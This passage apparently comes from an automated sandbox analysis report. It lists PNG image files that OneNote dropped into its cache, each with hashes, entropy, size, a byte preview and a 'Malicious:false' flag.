                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
